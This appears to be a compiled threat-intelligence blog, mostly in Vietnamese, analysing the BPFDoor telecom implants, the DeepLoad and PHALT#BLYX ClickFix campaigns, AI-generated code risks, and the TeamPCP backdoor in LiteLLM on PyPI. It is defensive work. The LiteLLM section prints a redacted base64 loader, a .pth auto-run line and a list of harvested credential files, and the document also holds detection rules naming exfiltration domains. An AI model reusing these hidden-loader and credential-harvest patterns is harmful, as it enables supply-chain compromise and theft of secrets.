Sự dịch chuyển logic của bộ lọc BPF filter từ việc áp khởi tạo socket SOCK_RAW sang SOCK_DGRAM mang lại góc nhìn rõ nét về mục tiêu của Red Menshen. Nhóm đang chủ động tinh giản hóa quy trình bóc tách gói tin ảo, nhường việc phân rã những lớp mạng viễn thông hóc búa (như IPsec, thiết lập GRE node) cho chính kernel của server mục tiêu. Hệ thống máy chủ điều khiển viễn thông thường duy trì một network array đa tầng rất nặng nề; sự tinh chỉnh này giúp BPFDoor loại bỏ hẳn những thư viện giải mã cồng kềnh, thu hẹp dung lượng hệ số lây nhiễm và rủi ro gây crash trên tiến trình lõi của hệ thống mạng quốc gia.

Ngoài ra, việc mã độc định danh đích xác tiến trình ngụy trang theo format HPE Insight Management (cmathreshd) có lệnh -p 5 -s OK riêng biệt để thả vào phần cứng Bare-Metal của HPE ProLiant chứng tỏ chiến dịch APT này nắm rất rõ kiến trúc hạ tầng mà victim - đặc biệt là các cụm lõi truyền thông 4G/5G của Ericsson - đang vận hành.

Việc biến thể lưu vết thẳng tệp ẩn hệ thống vào directory /var/run/user/0 thay vì sử dụng tập lệnh chmod cho phép attacker tránh thao tác sửa quyền thực thi lưu vào file auditd log. Đây là một mũi khoan cực hiểm đánh sập logic phát hiện file độc hại của các nền tảng host-monitoring EDR tại Việt Nam hiện tại.

Khuyến nghị

Immediate (0-24h)

• Tiến hành truy tìm trên hạ tầng mạng những kết nối gói ICMP chứa Sequence Number = 1234 và mang theo giá trị ICMP Code 1 không hợp lệ. Đây là các beaconing heartbeat bộc lộ điểm mù của biến thể.

• Kiểm tra danh sách tiến trình trên máy chủ Linux, chú trọng việc thực thi trực tiếp các process root mask như zabbix_agentd, dockerd hoặc cmathreshd không có ánh xạ thực tiễn tới /bin hay thư mục cài phần mềm. Khuyến khích quản trị viên vận hành ngay script rapid7_bpfdoor_check.sh để bắt được filter logic ghim vào các gói AF_PACKET.

Short-term (1-7 ngày)

• Chặn khẩn cấp và rà soát kết nối các endpoint phân giải DNS sau: ntpussl.instanthq.com, ntpupdate.ddnsgeek.com, ntpd.casacam.net, ntpupdate.ygto.com.

• Thay đổi mô hình rule detect phụ thuộc payload, áp dụng chỉ số nhận diện cấu trúc. Cập nhật rule Suricata để match byte level từ BPF backdoor như:
  udp[8:2] == 0x3182 or (icmp[8:2] == 0x1051 and icmp[icmptype] == icmp-echo)

Long-term

• Bổ sung các rule giám sát vào module hệ thống auditd, theo dõi chặt mọi thao tác tạo socket hệ thống dưới nhãn AF_PACKET, cụ thể nhắm tới lệnh setsockopt dùng để gắn chuỗi filter BPF lên kernel.

• Tái cấu trúc cơ chế phân quyền chạy dịch vụ bằng root trên các cụm lõi core viễn thông vật lý. Triển khai sâu hệ thống File Integrity Monitoring (FIM) để vá ngay các đường lây lan thư mục /run tạm thời.

MITRE ATT&CK Mapping

IOCs

BPFDoor Controller

6227cb77cb4ab1d066eebf14e825dbc0a0a7f1e9 64171d46c8290c5cd88e0fbce9e23dcecbe20865 65e4d507b1de3a1e4820e4c81808fdfd7e238e10 9bb8977cd5fc7be484286be8124154ab8a608d96

BPFDoor Malware

02aebc3762e766be0ac24ef57a135398344a8f7e 04aa241c574f0a7ec93ba5d27807d8e78467f21e 16f94f0df6003f1566b2108f55e247f60a316185 1db21dbf41de5de3686195b839e74dc56d542974 28765121730d419e8656fb8d618b2068408fe5ae 291af8adf6fa078692d0bf5e0d9d00c376bb3fff 316ac8215095a24429632849407311b18a16e0cf 351febd645c66a3c9a79253d0aefcce8ff77054c 3771319be1c8883610c65977811e93b0bdaddf6f 4181bc848a1cd32911a83e02feac9b8abbd69ae2 43b4dbc71ada99a7b8a8d6d0490ba5526a34f9a0 4b1ea5e7b28eb110d8741b76d34f7dbae6f13b79 4c89beab00e3119cf516d6f98d364a5d99232181 5ddcbe4b591293f7b34fc0ef65db6248bcc67eb6 64171d46c8290c5cd88e0fbce9e23dcecbe20865 7ab39d7aad49abb0f626383ed776fe20a3b4c8f3 88075bbc34655d1fa2a750f3bbdee38214974009 8b5844fcbf6af23bc0b410fc180e7e6bdd4f35c7 8ebe1a71af1061d9e943bdff46c5ed954d8c9348 937f6068df4e091cf92d50afb3c6b7cad1de6230 9bdea37835cdb7f0b291891386af28184ac85f79 a6b66b8b7eae2969fd7237888d30766baa1b2274 be47b0c2fb328a338874f6efbe8305ddb74f6a48 c38fc109e31c9d67a1efc6cb767f826b7e46fb19 c54e214810ca7042d013845076b0360bdd7132b2 c83651d7706efa8c115f2a0edb07f863f4e79ce5 d53b7d0030a095a3ffa4b67d13de82d08adda248 d61bf187c4cd3f9953b567b3ad320b9ecde1c347 d9037e0de902e6f7b6c5f1b3269ba482f5e67c8a dc94eaa39e11f2ca7739d2cfded9eec1967f33ee dd8db29e90c6b52ee3d2723cc168cf33ee0bb521 e17ddb6515f2d399552245191f98458b68fece7b ef03b84048193a158ecf1f7033ab0cc8869dd2a5 f61589b1f86d8692964a6bd3e96ddadbe22994eb fb488cdfd2e475f0d5cbecfe11e9bab2241f9d50

Tham khảo

New Whitepaper: Stealthy BPFDoor Variants are a Needle That Looks Like Hay

China-Linked Red Menshen Uses Stealthy BPFDoor Implants to Spy via Telecom Networks

Chinese Hackers Caught Deep Within Telecom Backbone Infrastructure - SecurityWeek

BPFDoors Hidden Controller Used Against Asia, Middle East Targets | Trend Micro (US)

Ba sự kiện riêng biệt trong vài tháng qua, khi đặt cạnh nhau, phác thảo một bức tranh đáng lo ngại về hướng đi của mối đe dọa hiện đại: DeepLoad — malware credential stealer dùng AI tạo obfuscation để né static detection và lây lan vào enterprise qua ClickFix; PHALT#BLYX — chiến dịch ClickFix mới nhắm vào ngành hospitality châu Âu bằng fake Blue Screen of Death triển khai DCRat; và dữ liệu từ Veracode và Georgia Tech xác nhận AI-generated code đang đưa lỗ hổng vào production với tốc độ chưa từng có.

Điểm hội tụ của cả ba: AI đang được khai thác đồng thời ở cả hai phía của chiến tuyến — accelerate developer productivity và amplify attacker capability. Và cả hai vecto đó đang gặp nhau tại điểm đến cuối cùng là tổ chức của bạn.

Hành động ưu tiên: Kiểm tra WMI subscriptions trên tất cả Windows endpoints đã tiếp nhận phishing trong 30 ngày qua, bật PowerShell Script Block Logging nếu chưa có, và audit quy trình code review để phủ AI-generated code.

1. DeepLoad: Khi AI Viết Malware Để Né AI-Powered Defense

Attack Chain

Báo cáo từ ReliaQuest (tháng 3/2026) mô tả DeepLoad là một credential stealer enterprise-grade với một đặc điểm nổi bật: cấu trúc evasion của nó được thiết kế có chủ đích để vô hiệu hóa từng lớp control mà phần lớn tổ chức đang dựa vào.

Infection bắt đầu bằng ClickFix — kẻ tấn công hiển thị một trang lỗi browser giả mạo, thuyết phục nhân viên paste một PowerShell command vào Windows Run dialog để "khắc phục sự cố". Một thao tác. Không cần khai thác lỗ hổng phần mềm. Không cần đặc quyền admin ban đầu.

Command đó thực hiện bốn việc cùng lúc:

• Tạo scheduled task để loader tự khởi động lại sau mỗi reboot
• Dùng mshta.exe — Windows utility hợp lệ — để fetch payload từ infrastructure của attacker
• Kích hoạt filemanager.exe (tên được chọn để blend vào process list) — standalone credential stealer chạy trên C2 channel riêng
• Cài một malicious browser extension thu thập passwords và session tokens theo thời gian thực

Staging domains được quan sát phục vụ malicious content trong vòng 22 phút sau khi go live — con số này nói lên rằng IOC-based blocking dựa vào threat feeds với độ trễ hàng giờ hoặc hàng ngày thực tế không có giá trị với campaign này.

AI-Generated Obfuscation: Signature-Based Detection Đã Không Còn Đủ

Đây là phần đáng chú ý nhất về mặt kỹ thuật. PowerShell loader của DeepLoad được độn bằng hàng nghìn phép gán biến vô nghĩa — code syntactically hợp lệ nhưng không thực hiện bất kỳ logic nào. Logic thực sự — một đoạn XOR decryption routine ngắn — nằm ở cuối script và decrypt shellcode hoàn toàn trong memory, không ghi bất kỳ thứ gì ra disk.

ReliaQuest nhận định với high confidence rằng lớp obfuscation này được tạo bởi AI. Implication không nhỏ: thay vì một analyst ngồi viết junk code thủ công, AI có thể regenerate lớp padding này thành một variant mới với signature khác trong vài giây. Defenders không còn có thể đuổi theo từng variant — họ phải hunt behavior thay vì pattern.

Để né file-based detection tiếp tục, DeepLoad dùng Add-Type của PowerShell để compile một C# injector trực tiếp trên máy nạn nhân, tạo ra một DLL với tên ngẫu nhiên. DLL này được biên dịch fresh mỗi lần thực thi — signature-based tools không có gì để match.

Payload sau đó inject vào LockAppHost.exe — Windows process quản lý lock screen. Đây là lựa chọn có tính toán: LockAppHost.exe không có lý do gì để khởi tạo outbound network connections, nên phần lớn security tools không monitor nó. Bất kỳ kết nối ra ngoài nào từ process này đều là anomaly rõ ràng — nhưng chỉ nếu bạn đang theo dõi nó.

Persistence Vượt Qua Remediation Thông Thường

Đây là điểm làm incident responder đau đầu nhất: trong một trường hợp được xác nhận, DeepLoad tái xuất hiện ba ngày sau khi host trông đã sạch hoàn toàn.

Cơ chế: một WMI event subscription được plant trong quá trình initial compromise. WMI subscriptions nằm ngoài phạm vi của quy trình remediation thông thường — xóa scheduled tasks, xóa temporary files, reinstall browser extension không đụng đến WMI. Subscription âm thầm drop filemanager.exe trở lại vào thư mục Downloads của user mà không cần bất kỳ tương tác nào.

Hệ quả thực tiễn: nếu bạn không explicitly audit và xóa WMI event subscriptions trước khi trả host về production, host đó chưa sạch.

Lây Lan Qua USB

Trong vòng 10 phút sau initial infection, DeepLoad đã ghi hơn 40 file vào USB drive được kết nối — được ngụy trang thành Chrome setup, Firefox installer, AnyDesk shortcut. Attacker infrastructure có dedicated /t1_usb tracking path, cho thấy USB propagation là feature được thiết kế có chủ đích, không phải side effect. Bất kỳ machine nào user cắm USB vào sau đó là một potential victim mới.

2. PHALT#BLYX: ClickFix Tiến Hóa Thêm Một Bước — Fake BSOD

Tổng Quan Chiến Dịch

Trong khi DeepLoad dùng fake browser error, PHALT#BLYX (được track bởi Securonix, phát hiện tháng 12/2025) đẩy ClickFix lên một mức thuyết phục khác bằng cách lạm dụng một trong những hình ảnh đáng sợ nhất với người dùng Windows: màn hình xanh chết chóc (BSOD).

Mục tiêu: ngành hospitality châu Âu, thời điểm triển khai chiến dịch: cao điểm mùa lễ. Kết quả cuối: triển khai DCRat — một remote access trojan có liên kết với Russian-speaking developers, cho phép remote access toàn diện và deploy secondary payloads.

Kill Chain Chi Tiết

Bước 1 — Phishing email giả Booking.com: Nạn nhân nhận email thông báo hủy đặt phòng đột ngột với số tiền phạt tính bằng Euro — detail này xác nhận campaign đang nhắm vào tổ chức châu Âu. Email chứa link dẫn đến một clone site của Booking.com (ví dụ: low-house[.]com) được thiết kế đủ chính xác để qua mắt nhân viên đang bận trong mùa cao điểm.

Bước 2 — Fake "page loading" error: Khi nạn nhân click "See Details", website hiển thị lỗi page loading, yêu cầu click "Refresh". Đây là bước tạo tâm lý quen thuộc — người dùng đã được điều kiện hóa để refresh khi web chậm.

Bước 3 — Fake CAPTCHA → Fake BSOD: Browser chuyển sang full-screen mode và hiển thị màn hình BSOD giả mạo hoàn chỉnh. Nạn nhân được hướng dẫn mở Windows Run dialog (Win + R) và nhấn Ctrl+V — command độc hại đã được tự động copy vào clipboard từ bước trước. Nhấn Enter là đủ để bắt đầu infection.

Điểm đáng chú ý: BSOD thật không bao giờ cung cấp recovery instructions hay yêu cầu người dùng nhập lệnh. Nhưng với nhân viên front desk dưới áp lực giải quyết tranh chấp khách hàng, đây là detail họ có thể bỏ qua.

Bước 4 — Multi-stage payload delivery: Command PowerShell download một .NET project file (.proj) và compile nó bằng MSBuild.exe — công cụ build hợp lệ của Microsoft. Đây là kỹ thuật Living Off The Land (LoTL) tinh vi: không drop binary ngoại lai, dùng compiler của chính Windows để tạo malware ngay trên máy nạn nhân. File được compile sau đó tải DCRat.

Bước 5 — DCRat installation: DCRat cung cấp cho kẻ tấn công: remote shell, file transfer, keylogging, screenshot capture, và khả năng load secondary plugins. Cyrillic debug strings và cấu trúc code có điểm tương đồng với AsyncRAT cho thấy nguồn gốc Russian-speaking developers.

IOC — PHALT#BLYX

# Phishing/redirect domains
low-house[.]com
oncameraworkout[.]com
 
# Suspicious processes to monitor
MSBuild.exe  ← nếu spawned bởi mshta.exe hoặc PowerShell, cần điều tra
mshta.exe    ← bất kỳ outbound connection nào từ process này
 
# File indicators
*.proj files trong %TEMP% hoặc %ProgramData%
Internet Shortcut (.url) files trong Startup folder
Suspicious entries trong %ProgramData%

3. AI-Generated Code: Lỗ Hổng Đang Vào Production Ở Tốc Độ Chưa Từng Có

Bức Tranh Hiện Tại

Nếu DeepLoad và PHALT#BLYX cho thấy AI đang được weaponize ở phía tấn công, thì dữ liệu từ nghiên cứu năm 2025–2026 phác thảo một vấn đề song song ở phía phòng thủ: AI-generated code đang tạo ra lỗ hổng với tốc độ mà quy trình security review truyền thống không theo kịp.

Một số con số đáng chú ý:

Veracode test hơn 100 LLM trên 4 ngôn ngữ (Java, Python, C#, JavaScript): 45% code samples đưa vào OWASP Top 10 vulnerabilities. Java là ngôn ngữ tệ nhất với 72% security failure rate. AI-generated code có 2.74x nhiều vulnerabilities hơn code viết bởi con người.

Apiiro phân tích Fortune 50 enterprises: 322% nhiều privilege escalation paths hơn trong AI-generated code so với human-written code. 153% nhiều design flaws hơn. Tính đến tháng 6/2025, AI-generated code đang thêm hơn 10.000 security findings mới mỗi tháng — tăng 10 lần so với tháng 12/2024.

Georgia Tech's Vibe Security Radar (track từ tháng 5/2025): tháng 1/2026 có 6 CVE trực tiếp từ AI-generated code, tháng 2 tăng lên 15, tháng 3 lên 35 CVE trong một tháng. Tính đến ngày 20/03/2026: 74 CVE xác nhận trong tổng số 43.849 advisory được phân tích có thể quy trực tiếp cho AI-generated code. Researcher Hanqing Zhao nhấn mạnh đây là lower bound, không phải tỷ lệ.

Tại Sao AI Code Lại Insecure?

Câu trả lời nằm ở cách LLM học và generate code. AI coding tools không hiểu security intent — chúng reproduce code dựa trên prevalence trong training data. Nếu training data chứa nhiều code vulnerable hơn code secure cho một pattern nhất định, model sẽ suggest code vulnerable. Đây không khác gì copy-paste từ Stack Overflow mà không review, chỉ là ở scale lớn hơn và nhanh hơn.

Một vấn đề cụ thể: AI có xu hướng ingest vulnerable hoặc deprecated dependencies vào các project mới khi giải quyết coding task. Một dependency được pull trong year 2019 và không được maintain có thể trông "đúng" với AI — nó xuất hiện trong training data và giải quyết bài toán về mặt chức năng. Security context không nằm trong reasoning.

Điều đáng lo ngại hơn: một Snyk survey cho thấy gần 80% developers nghĩ AI-generated code an toàn hơn — một false sense of security nguy hiểm. Kết quả: code được push vào production với ít scrutiny hơn, không phải nhiều hơn.

Điểm Giao Thoa Với Threat Landscape

Đây là nơi ba chủ đề trong bài này kết nối: DeepLoad được thiết kế bởi kẻ tấn công biết rằng defenders đang dựa vào static scanning và signature matching. Nếu defenders đang generate security code bằng AI nhưng AI code có 45% failure rate, và attackers đang dùng AI để tạo ra malware né detection — thì cuộc đua đang nghiêng về phía nào?

Nguyên tắc cơ bản cũng bị đảo lộn: nếu AI code có thể introduce supply chain vulnerabilities (như Endor Labs và TechTarget đều document), và ClickFix campaigns như PHALT#BLYX đang target developers và enterprise staff với increasing sophistication — thì một developer vibe-coding một internal tool và một kẻ tấn công dùng ClickFix để gain foothold vào developer machine của họ là hai vecto song hành, không phải riêng biệt.

4. Nhận Định

Ba thread này hội tụ ở một điểm mà chúng tôi cho là cần được nói thẳng: quy trình security mà phần lớn tổ chức đang dùng được xây dựng để chống lại một threat model đã cũ.

Static scanning không bắt được malware generated fresh mỗi lần execution. Signature matching không bắt được variant được tạo lại bằng AI trong vài giây. WMI-based persistence không bị loại bỏ bởi "xóa scheduled tasks và reimage". Browser-based ClickFix không bị chặn bởi mail filter. Và AI-generated code không tự động secure chỉ vì developer không phải là người viết từng dòng.

Về DeepLoad cụ thể: cả hai incident trong báo cáo ReliaQuest đều có một điểm chung là một người dùng bình thường, không phải admin, đã paste một command vào Windows Run dialog. Đây không phải lỗ hổng kỹ thuật — đây là social engineering gap. Security awareness training về ClickFix chưa đủ phổ biến so với awareness về phishing email truyền thống.

Với các tổ chức trong khu vực Đông Nam Á: hospitality và travel sector là mục tiêu rõ ràng của PHALT#BLYX — và đây là ngành đang tăng trưởng mạnh tại Việt Nam. Nhân viên front desk xử lý đặt phòng, nhận email từ Booking.com, và thường chịu áp lực cao vào peak season — đây là perfect target cho lure thiết kế của campaign này. Adaptation của campaign sang tiếng Việt và lure địa phương (VND thay vì EUR) không đòi hỏi effort lớn từ phía attacker.

Trend lớn hơn: ClickFix đang trở thành delivery mechanism ưa thích vì nó bypass cả email filtering lẫn web proxy. Nếu người dùng là người chạy lệnh, không có security control nào ở giữa. Gần như mọi dạng lure đã được thử nghiệm trong các ClickFix campaign: fake CAPTCHA, fake browser update, fake Office error, fake VPN reconnect, và bây giờ là BSOD. Không có dấu hiệu dừng lại.

5. Khuyến Nghị

Ngay lập tức (0–24h)

Với DeepLoad / ClickFix exposure:

# Audit WMI event subscriptions — đây là hidden persistence thường bị bỏ sót
Get-WMIObject -Namespace root\subscription -Class __EventFilter
Get-WMIObject -Namespace root\subscription -Class __EventConsumer
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding
 
# Xóa unauthorized subscription (thay <Name> bằng tên thực tế)
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding | `
  Where-Object { $_.Filter -like "*<suspicious_name>*" } | Remove-WmiObject
 
# Kiểm tra LockAppHost.exe có network activity không
# (trong EDR/Sysmon: process = LockAppHost.exe AND event_type = network)

# Bật PowerShell Script Block Logging (nếu chưa có)
$regPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
New-Item -Path $regPath -Force | Out-Null
Set-ItemProperty -Path $regPath -Name "EnableScriptBlockLogging" -Value 1

Rotate credentials trên tất cả hosts có dấu hiệu ClickFix execution trong 30 ngày qua (nhìn lại Event Log cho mshta.exe hoặc PowerShell với -ExecutionPolicy Bypass).

Audit USB drives kết nối với bất kỳ host nào nghi ngờ trong cùng khoảng thời gian.

Ngắn hạn (1–7 ngày)

Detection rules cần triển khai:

# Splunk/Elastic — Detect ClickFix execution pattern
process_name="mshta.exe" AND parent_process_name IN ("explorer.exe", "cmd.exe") 
AND cmdline LIKE "*.hta*"
 
# Flag LockAppHost.exe spawning children hoặc initiating network
process_name="LockAppHost.exe" AND (event_type="process_create" OR event_type="network")
 
# Flag MSBuild.exe spawned bởi script engine (PHALT#BLYX pattern)
process_name="MSBuild.exe" AND parent_process_name IN ("powershell.exe", "mshta.exe", "wscript.exe")
 
# WMI persistence creation
event_id=5861 AND source="Microsoft-Windows-WMI-Activity"

Security awareness: Brief nhanh cho tất cả users: không bao giờ paste command vào Windows Run dialog hoặc PowerShell từ hướng dẫn trên website, kể cả khi site trông giống Booking.com, Microsoft, hay bất kỳ vendor nào.

Với hospitality sector: Review email filtering rules để flag Booking.com impersonation, đặc biệt email có link đến domain khác booking.com nhưng chứa từ khóa "reservation", "cancellation", "charge".

Dài hạn

Về AI-generated code security:

Establish AI Code Security Policy với ít nhất ba tầng kiểm soát:

1. Prohibited for AI generation (phải viết tay và review kỹ): authentication logic, authorization frameworks, cryptographic implementations, secrets management, payment processing.

2. Permitted with mandatory SAST scan: CRUD operations, API integrations, UI components, utility functions. Tất cả AI-generated code phải qua SAST gate trong CI/CD trước khi merge.

3. Prompting hygiene: Yêu cầu developers include security context trong prompts. Veracode research cho thấy một generic security reminder trong prompt cải thiện correct + secure code rate từ 56% lên 66% với Claude Opus 4.5 Thinking. Nhỏ nhưng measurable.

Về ClickFix và social engineering:

• Monitor mshta.exe execution từ non-standard parent processes — không có business justification cho điều này trong phần lớn môi trường enterprise
• Cân nhắc block mshta.exe hoàn toàn nếu organization không có use case hợp lệ (dùng AppLocker hoặc Windows Defender Application Control)
• Implement Application Control để restrict PowerShell execution policy — user standard không cần -ExecutionPolicy Bypass

Về visibility trên developer endpoints:

EDR phải phủ developer laptop, không chỉ servers. Trong cả DeepLoad và supply chain campaigns gần đây (LiteLLM, Trivy), developer workstations là target có giá trị cao nhất — đây là nơi credentials của tất cả systems đang phát triển tồn tại.

6. IOC Tổng Hợp

DeepLoad

# Processes cần monitor
LockAppHost.exe    ← nếu có network activity hoặc spawn child processes
filemanager.exe    ← tên được chọn để blend vào process list, nhưng không thuộc Windows
mshta.exe          ← bất kỳ outbound connection hoặc unusual parent
 
# Behaviors
PowerShell Add-Type compilation → random-named DLL trong %TEMP%
WMI event subscription creation (Event ID 5861)
USB write activity với filenames chứa: chrome, firefox, anydesk, setup, installer
Scheduled task creation từ mshta.exe hoặc PowerShell với -ExecutionPolicy Bypass

PHALT#BLYX (ClickFix BSOD)

# Domains
low-house[.]com
oncameraworkout[.]com
 
# File patterns
*.proj files trong temp directories
Internet Shortcut (.url) files trong %AppData%\Microsoft\Windows\Start Menu\Programs\Startup
 
# Process behavior
MSBuild.exe spawned by mshta.exe, wscript.exe, hoặc powershell.exe

7. Tài Liệu Tham Khảo

1. ReliaQuest — Threat Spotlight: DeepLoad Malware Pairs ClickFix Delivery with AI-Generated Evasion (2026-03-31)
2. The Hacker News — DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials (2026-03-31)
3. CyberScoop — Researchers say credential-stealing campaign used AI to build evasion 'at every stage' (2026-03-31)
4. Dark Reading — AI-Powered 'DeepLoad' Steals Credentials, Evades Detection (2026-03-31)
5. Securonix — Analyzing PHALT#BLYX: How Fake BSODs and Trusted Build Tools are Used to Construct a Malware Infection (2026-01-05)
6. BleepingComputer — ClickFix attack uses fake Windows BSOD screens to push malware (2026-01-07)
7. The Hacker News — Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat (2026-01-07)
8. TechTarget — Security risks of AI-generated code and how to manage them (2025-05-29)
9. Veracode — 2025 GenAI Code Security Report (2025-08)
10. Infosecurity Magazine — Researchers Sound the Alarm on Vulnerabilities in AI-Generated Code (2026-03-27)
11. The Register — Using AI to code does not mean your code is more secure (2026-03-26)
12. Dark Reading — As Coders Adopt AI Agents, Security Pitfalls Lurk in 2026 (2025-12-30)

On March 24, 2026, threat group TeamPCP successfully pushed two backdoored versions of the Python library LiteLLM (v1.82.7 and v1.82.8) to PyPI — a package registry serving over 95 million downloads per month. This was not an isolated incident. It was the final link in a systematic supply chain campaign running nearly a month, originating with the compromise of Trivy (a widely-used vulnerability scanner), pivoting through Checkmarx KICS, and culminating in LiteLLM — the LLM proxy library embedded in the majority of modern AI pipelines.

The payload executes immediately upon package import, or on every Python process startup via a .pth file mechanism. Targeted data includes: SSH keys, cloud credentials (AWS/GCP/Azure), Kubernetes secrets, database passwords, .env files, and cryptocurrency wallets. All harvested data is encrypted using RSA-4096/AES-256-CBC before exfiltration to attacker-controlled infrastructure.

Immediate priority action: Audit every environment for LiteLLM installations between 10:39–16:00 UTC on March 24, 2026. If found — assume compromise and rotate all credentials.

1. Campaign Timeline

2. Attack Flow

Phase 1: Initial Access — Trivy CI/CD Compromise

TeamPCP exploited the pull_request_target GitHub Actions workflow — a common configuration that allows PRs from fork repositories to run in the context of the base repository, with access to its secrets. After stealing the PAT, the group executed an imposter commit attack: force-pushing malicious code into all existing version tags.

The consequence: any pipeline using uses: aquasecurity/trivy-action@v0.x.x — including previously pinned versions — began executing attacker code starting March 19. Pipelines referencing version tags had no indication anything had changed; release metadata appeared untouched.

Phase 2: Credential Harvesting & Lateral Movement

kamikaze.sh — the primary payload deployed in the Trivy wave — evolved through three versions:

• Version 1: A 150-line bash script performing environment fingerprinting and harvesting AWS/GCP/Azure credentials via the Instance Metadata Service (IMDS)
• Version 2: Added SSH key extraction, .env file scanning, and Kubernetes secret enumeration
• Version 3: A multi-stage dropper with persistence mechanisms

The credential chain: Trivy compromise → stolen credentials unlock Checkmarx KICS → the PYPI_PUBLISH token for LiteLLM is exfiltrated from a GitHub Actions runner running a Trivy scan as part of its own CI/CD workflow.

Phase 3: PyPI Package Poisoning — LiteLLM

Attackers injected 12 lines of code into litellm/proxy/proxy_server.py at line 128, placed between two unrelated legitimate code blocks — a steganography-style technique designed to evade manual code review:

# Malicious injection at proxy_server.py:128
# Base64-encoded payload decoded and executed via subprocess
# Avoids exec() to bypass static analysis tools
import base64, subprocess, tempfile, os
_d = base64.b64decode("<REDACTED_PAYLOAD>")
_f = tempfile.NamedTemporaryFile(delete=False, suffix='.py')
_f.write(_d); _f.close()
subprocess.Popen(['python3', _f.name], ...)

Critically, the GitHub source at the corresponding commit does not contain these lines — the injection occurred during or after the wheel build process, after the source was published to the repository. Source-level code review would not have caught it.

v1.82.8 adds litellm_init.pth:

# litellm_init.pth — placed in site-packages
# Python's site.py processes .pth files automatically on every interpreter startup
import subprocess; subprocess.Popen(['python3', '-c', '<payload>'], ...)

The .pth mechanism is particularly aggressive: no import litellm required — as long as litellm is installed in the environment, the payload runs on every Python process startup. This is why McMahon's machine crashed: the child process triggers the .pth → spawns another child → exponential fork bomb. The fork bomb was an unintentional bug in the malware. Without it, the campaign would likely have gone undetected far longer.

Phase 4: Multi-Stage Payload Execution

Stage 1 — Credential Collection:

The payload harvests and packages the following into tpcp.tar.gz:

~/.ssh/id_rsa, id_ed25519, config
~/.aws/credentials, ~/.aws/config
~/.config/gcloud/*, ~/.azure/*
~/.kube/config
**/.env files
~/.gitconfig, ~/.docker/config.json
Database passwords (PostgreSQL, MySQL)
Cryptocurrency wallet files

The archive is encrypted: AES-256-CBC with a random session key, the session key encrypted with a hardcoded RSA-4096 public key, then POST-ed to https://models[.]litellm[.]cloud/ — a domain deliberately constructed to resemble LiteLLM's legitimate infrastructure.

Stage 2 — Kubernetes Lateral Movement:

If a Kubernetes service account token is present on the compromised host:

# Payload enumerates all nodes in the cluster
kubectl get nodes --all-namespaces
# Deploys a privileged pod to EVERY node in kube-system
# Pod mounts the host filesystem (/)
# Installs persistence dropper across all nodes

Stage 3 — Persistent Backdoor:

~/.config/sysmon/sysmon.py              # Python backdoor script
~/.config/systemd/user/sysmon.service  # Systemd service
Service display name: "System Telemetry Service"

The backdoor polls C2 every 50 minutes: GET checkmarx[.]zone/raw → receives a URL → downloads and executes the next-stage payload. Kill switch: if the response contains the string youtube.com, execution halts — an anti-sandbox evasion technique.

In Kubernetes environments, this persistence mechanism is deployed across every node in the cluster via privileged pods mounting the host filesystem.

3. Indicators of Compromise (IOC)

Network IOCs

# C2 Domains
models[.]litellm[.]cloud     # Exfiltration endpoint (impersonates LiteLLM)
checkmarx[.]zone             # C2 backdoor polling (impersonates Checkmarx)
scan[.]aquasecurtiy[.]org    # Trivy wave C2 (typosquat of aquasecurity)
 
# Registrar: Spaceship, Inc. | Hosting: DEMENIN B.V.

Host-Based IOCs

# Files
~/.config/sysmon/sysmon.py
~/.config/systemd/user/sysmon.service
/tmp/pglog                           # Fake PostgreSQL log
/tmp/.pg_state                       # State file
tpcp.tar.gz                          # Credential archive in tmp directories
 
# Python environment
litellm_init.pth  (in site-packages)
proxy_server.py   (modified, if running litellm 1.82.7 or 1.82.8)

Package Indicators

# Malicious versions
litellm==1.82.7  (uploaded 2026-03-24 10:39:24 UTC)
litellm==1.82.8  (uploaded 2026-03-24 10:52:19 UTC)
 
# Last known-clean version
litellm==1.82.6  (published 2026-03-22, verified clean by Endor Labs)

GitHub IOCs

# Repository patterns created by attacker in victim org
docs-tpcp-*
 
# Commit message indicator
"teampcp update"
 
# Attacker Telegram channels
@Persy_PCP
@teampcp

Detection — Check for Exposure

# Check installed LiteLLM version
pip show litellm 2>/dev/null | grep -E "^Version|^Location"
pip list --format=freeze | grep litellm
 
# Search for the malicious .pth file
find ~/.cache/uv -name "litellm_init.pth" 2>/dev/null
find /usr -name "litellm_init.pth" 2>/dev/null
 
# Check for persistence artifacts
[ -f ~/.config/sysmon/sysmon.py ] && echo "COMPROMISED: sysmon.py found"
[ -f ~/.config/systemd/user/sysmon.service ] && echo "COMPROMISED: sysmon.service found"
 
# Search for credential archive
find /tmp -name "tpcp.tar.gz" 2>/dev/null

SIEM / Network Detection

# Splunk / Elastic
dest_domain IN ("models.litellm.cloud", "checkmarx.zone", "scan.aquasecurtiy.org")
AND (http_method="POST" OR http_method="GET")
 
# Suricata — flag outbound POST to exfiltration domain
alert http any any -> any any (
  msg:"TeamPCP LiteLLM Exfiltration Attempt";
  content:"models.litellm.cloud"; http_header;
  content:"POST"; http_method;
  sid:2026001; rev:1;
)

4. MITRE ATT&CK Mapping

5. Threat Actor Profile: TeamPCP

TeamPCP (also tracked as PCPcat, Persy_PCP, ShellForce, DeadCatx3 per Wiz Threat Center) has been active since at least December 2025. The group embeds the string "TeamPCP Cloud stealer" directly inside their payloads — making no attempt to hide attribution. Whether this reflects operational confidence or deliberate reputation-building is unclear.

Defining characteristic: Each target is not an end goal — it's a pivot point to the next one. Trivy yielded credentials to reach Checkmarx KICS; KICS yielded the PYPI_PUBLISH token for LiteLLM. This is deliberate credential chaining, not opportunistic targeting.

Target selection logic: TeamPCP exclusively compromises security-adjacent tools — vulnerability scanners (Trivy), IaC analyzers (KICS), LLM proxies (LiteLLM). The rationale is straightforward: these tools run with elevated privileges by design and hold broad access to credentials and infrastructure. Compromising a security tool means inheriting everything that tool was authorized to see.

Notable capabilities:

• Uses an AI agent (openclaw) for automated attack targeting — documented by Aikido as one of the first observed uses of an AI agent operationally in a supply chain campaign
• CanisterWorm leverages Internet Computer Protocol (ICP) as C2 — a decentralized layer that cannot be taken down by domain registrars or hosting providers
• The botnet for comment flooding used previously compromised developer accounts rather than purpose-created profiles — 76% account overlap with the botnet deployed during the Trivy disclosure (analysis by Rami McCarthy)
• The 13-minute gap between v1.82.7 and v1.82.8 shows the attacker was actively iterating during the attack window, not executing a pre-planned script

